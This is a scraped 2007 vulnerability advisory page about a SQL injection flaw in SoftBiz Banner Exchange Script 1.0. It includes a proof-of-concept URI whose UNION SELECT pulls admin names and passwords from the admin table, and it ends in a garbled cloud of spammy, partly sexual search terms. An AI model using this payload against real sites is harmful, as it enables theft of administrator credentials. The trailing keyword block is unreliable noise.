about advertise contact
Search: Home Vulnerabilities Exploits News Articles RSS Feeds Archive Talk

exploits , vulnerabilities , articles , Softbiz Banner Exchange Script CAMPAIGN_STATS.PHP SQL Injection Vulnerability


Title Softbiz Banner Exchange Script CAMPAIGN_STATS.PHP SQL Injection Vulnerability
Published 2007-11-11-12:00AM
Updated 2007-11-13-04:25PM
Class Input Validation Error
CVE  
Remote  Yes
Local  No
Credit  IRCRASH discovered this vulnerability.
Vulnerable  SoftBiz Banner Exchange Script 1.0
Not Vulnerable  
Code  Attackers can use a browser to exploit this issue.The following proof-of-concept URI is available:http://www.example.com/campaign_stats.php?id=999999%20union/**/select/**/0,1,2,3,4,5,6,7,8,admin_name,10,pwd,12,13,14,15/**/from/**/sbbanners_admin/*
TXT  t3xt 1t!


Advertising

Copyright 2007, SecurityDot
Wed, 16 Dec 2009 17:14:20 +0000

Friends : milw0rm.com , secunia.com , securityfocus.com
GOOGLE
NEWS EXPLOITS VULNS
exploits , 0day exploits , newest exploits , vulnerabilities , newest vulnerabilities , 0day vulnerabilities , newest articles , linux articles , articles
200 /compo www.tuigua www.tuigua www.tuigua %...hp?f=t 1di8.com Wap4sex.co sunxun.inf move www.tuigua Kiki ameli www.tuigua 200 /compo news for c Sexs indon W ww.bangl /browsers/ Anisha kap maxcpm.inf xiyaxi.com ip board 2 www.indian xma asian+citi Gateway %252F%255B docs%252Ff www.yingyu amrica sex www.bjfkwy indian sex 2.1.2 home.php?c www.73ku.c telugu sex nxnxx hh.cnasy.c mambo Remo News Searc OpenSSL 0. vml fill Alafasy mp hh.cnasy.c 200 ///inc vBulleting news+for+C WWW.SEXYAR GET /galle www.eia8.c Coppermin